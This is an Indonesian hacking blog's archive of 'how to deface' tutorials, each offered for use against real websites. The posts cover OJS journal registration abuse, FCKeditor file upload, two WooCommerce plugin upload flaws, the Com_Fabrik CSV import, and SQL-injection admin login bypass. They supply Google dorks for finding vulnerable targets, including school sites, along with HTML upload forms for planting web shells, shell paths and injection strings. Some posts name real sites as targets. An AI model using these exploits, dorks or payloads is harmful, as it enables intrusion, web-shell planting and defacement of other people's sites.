RasyidMF: Exploit

Latest Updates

Showing posts with label Exploit. Show all posts
Showing posts with label Exploit. Show all posts

Cara Deface OJS (Open Journal System)

01:00:00
Hasil gambar untuk OJS
Cara Deface OJS (Open Journal System)
Kali ini mimin akan share Cara Deface OJS (Open Journal System) . bisa di bilang teknik ini ribet :V . karena harus mengregistrasi dulu :3

Dork : intext:Journal "new submission"
inurl:/index.php/index/user/register
intext:about submission "Journal"
inurl:/index.php/ojs

*Yang laen use your brain :D

Fotonya Copas aja ya :D

Tutorial :

1.Kamu harus mendaftar dulu disini > site,com/index.php/index/user/register
-Jangan Lupa untuk mencentang Registrasi sebabagi Author / penulis & Jangan ceklis Email konfimasi
2. Setelah Registasi Klik "New Submission"
3. Selesaikan Step 1
4. Di Step 2, kamu dapat upload shell (contoh format shell : a.phtml)
5.Jika Sukses ! maka akan muncul seperti ini
6.Cari akses shell nya

Penjelasan : 
Filename : 4-4-1-SM.phtml
4 = id user kamu

Shell Path : 
http://www.contoh.com/files/journals/1/articles/[iduser]/submission/original/[nama file].phtml

Contoh : files/journals/1/articles/4/submission/original/4-4-1-SM.phtml

Cara Deface Dengan FCKeditor

22:22:00
Hasil gambar untuk fckeditor
Cara Deface Dengan FCKeditor - 
Yak kali ini mimin akan share tutorial Deface Dengan Cara Deface Dengan FCKeditor. Dengan menggunakan FCKeditor, kita bisa mengupload sebuah file ke web tersebut seperti halnya mengupload file deface, namun berformat txt. Ok, berikut caranya.
Buatlah sebuah file berformat txt dengan notepad, isi dengan kata - kata yang ingin diucapkan layaknya file deface, jangan lupa di save dan beri nama

Dork :
inurl:/html/siswa.php? site:sch.id
inurl:/html/alumni.php? site:sch.id
inurl:/html/guru.php? site:sch.id
inurl:/editor/filemanager/connectors/test.html
*Cari sendiri yang perawan :3

Biasanya di web Sekolah !

Exploit : /editor/filemanager/connectors/test.html

Tutorial :

1.Cari Web nya make Dork Yang Diatas. Jika sudah dapat , Masukan Exploitnya
/editor/filemanager/connectors/test.html
Contoh : www.site.com/editor/filemanager/connectors/test.html

2.Jika Vuln , maka akan muncul seperti ini
Cara Deface Web Sch.id Dengan FCKeditor
Sesuai gambar, di kolom connector silahkan anda ganti dengan PHP. Resource type file

6. Klik "pilih file" dan pilih file txt yang sudah dibuat tadi

7. Klik "upload"

8. Jika berhasil akan muncul tulisan kira - kira seperti ini 'file uploaded with no error'

9. Untuk melihat file uploadnya, anda buka webnya dengan www.site.com/userfiles/file/namafilemu.txt

10. Jika berhasil maka nanti akan muncul text yang tadi anda buat di notepad.

Gitu saja Tutorial dari Newbie :V
Kalo masih gk ngerti ! Koment aja di bawah :V

Cara Deface WP Plugins WooCommerce Products Customizer Fileupload

23:21:00
Hasil gambar untuk WP Plugins WooCommerce Products Customizer Fileupload
Cara Deface WP Plugins WooCommerce Products Customizer Fileupload
Yak kali ini ane akan mengshare Tutorial "Cara Deface WP Plugins WooCommerce Products Customizer Fileupload"
sebenarnya nih bukan deface ! atau cuman bisa upload gambar ! tpi gk thu juga kan , cobain aja pas bisa upload shell
Tadi ane barusan aja muter muter di web orang , nah pas ane bukan foldernya woocommerce-products-customizer . tiba tiba blank ane coba coba mau :D
Tpi pas itu ane coba upload shell gk mau , mungkin di web lain bisa :D. Bisa bisa neh Trik baru :D 

HTML Vroh : <form method="POST" action="http://test.jacketman.net/wp-content/plugins/woocommerce-products-customizer/jquery_calls.php"
enctype="multipart/form-data">
<input type="file" name="userfile"/><button>Croot Punyamu</button>
</form>

Yang warna biru ganti webnya :D

Dorknya Guyss : 
inurl:/wp-content/plugins/woocommerce-products-customizer/

Exploit nya guys : /wp-content/plugins/woocommerce-products-customizer/jquery_calls.php

Tutorial :

1.Cari web dari dork yang udeh mimin siapkan , buka web tersebut . masukan exploit , jika Gambarnya Blank berarti Vuln :D
2.Kemudian buka HTML Exploit nya tadi , kemudian cari file .jpg atau terserah lah
3.Jika berhasil maka akan muncul seperti dibawah ini
4.Filenya akan berada di http://test.jacketman.net//wp-content//uploads//57f9e15a25804.jpg
5.Jika gk berhasil , mungkin muncul nya cuman tulisan :D
6.Enjoy


Trik Dari Mastah Ane : Mr.D3c0d3r #98 + 5uSu S4p1

-=- THANKS FOR READING :D -=-

Deface Wp-Woocommerce Custom Tshirt Shell Upload Vulnerability

22:37:00
Hasil gambar untuk woocommerce
Deface Wp-Woocommerce Custom Tshirt Shell Upload Vulnerability
Langsung saja ke tutorial !

Dork : inurl:/wp-content/plugins/woocommerce-custom-t-shirt-
*Yang laen use your brain atau Contact mimin aj :D . biasanya dia bisa buat dork sendiri

HTML Exploit :
<form enctype="multipart/form-data"
    action="http://www.targetkalian.com/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php" method="post">
    <input type="jpg" name="url" value="./" /><br />
    Please choose a file: <input name="uploadfile" type="file" /><br />
    <input type="submit" value="upload" />
    </form>

Exploit : /wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php

Lokasi Shell : /wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/(Nomor random).php

Tutorial :


1.Jika ada tulisan "error" di web tersebut , berarti Vuln 


2.Copy Link yang Vuln , kemudian paste di HTML Exploit Yang Bertanda Warna Merah Diatas

3.Pilih Shell kalian , kemudian klik Upload
4.Maka akan muncul angka acak Contoh : "1285798710.php"
5.Akses Shellnya :  /wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/(Nomor acak yang tadi).php

6.Enjoy ! Terserah dah mau di apain tuh web

-=-THANKS FOR READING :D-=-

Cara Deface Dengan Metode Com_Fabrik

00:45:00
Hasil gambar untuk com_fabrik
Cara Deface Dengan Metode Com_Fabrik :
Kali ini mimin akan mengshare tutorial Deface lagi :D . btw neh trik lama . gk ap kan untuk coba coba :D . 

Dork :
inurl:viewTable?cid=

Exploit :
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Tutorial :

Fresh Target : www.farp.com

1.Cari Web yang Vuln Dulu ya :D . Ane udeh dapat yang fresh . http://www.farp.com/
2.(Yang Blom Dapet) Setelah web dibuka, maka akan muncul Sorry this form is not publish berarti tandanya Vuln :D
3.Masukan Exploit nya (Diatas ada). jika tidak ada muncul Upload (Seperti Gambar Dibawah ini) Berarti tidak VULN
4.Nah gambar ini tandanya web itu vuln :D
5.Klik "Pilih File"
6.Cari Shell Kalian
7.Kemudian Klik "Import CSV"
8.Jika Muncul Gambar yang dibawah ini Berarti Antara Bisa / Gk
9.Jika belum di test ya gk bisa . Shell/Script nya ada di http://www.farp.com/media/namashellkalian.php
10.Kalo dah muncul shellnya . terserah kalian mau ngapain !

Bagaimana Guys ? Mudah Atau Susah :V ?

Author : Mr.D3c0d3r #98

-=- THANKS FOR READING -=-

Cara ByPass SQL Admin Login

00:09:00
Hasil gambar untuk admin login
Tutorial ByPass SQL Admin Login
Yak ! Kali ini mimin akan mengshare Cara "Cara ByPass SQL Admin Login"
Mimin mles ketik :V . Jadi langsung saja

Dork :
inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php

inurl:/admin_panel/
Kembangin sendiri biar dapet vuln yang jones :3

Exploit :
Username : ' or 1=1 limit 1 -- -+
Password : ' or 1=1 limit 1 -- -+

Tutorial :


  1. Masuk ke admin loginnya
  2. Kemudian isi Username dan Password yang diatas
  3. Jika login berarti vuln jika tidak berarti gk vuln
  4. Jika sudah login terserah mau diapain tuh web
Mudah Bukan ?


Author : Mr.D3c0d3r #98
Thanks Mastah Kami : 5usu S4p1

-=-Thanks For Reading :D-=-
 
Copyright © RasyidMF. Designed by OddThemes & Best Wordpress Themes 2018